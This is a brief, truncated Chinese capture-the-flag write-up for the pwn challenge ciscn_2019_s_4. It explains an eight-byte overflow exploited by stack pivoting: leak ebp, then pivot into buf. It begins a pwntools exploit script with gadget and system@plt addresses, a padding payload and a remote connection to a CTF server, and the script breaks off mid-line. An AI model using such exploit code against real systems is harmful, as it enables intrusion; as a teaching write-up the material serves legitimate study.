【pwn】 ciscn_2019_s_4

main函數,存在八個字節溢出,棧遷移,第一次泄露ebp,獲得棧上buf地址,遷移到buf便可。node from pwn import * io=remote('node3.buuoj.cn',28060) leave=0x8048562 sys_plt=0x8048400 pl1='a'*0x24+'bbbb' io.send(pl1) io.recvuntil('bbbb') ebp=
相關文章
相關標籤/搜索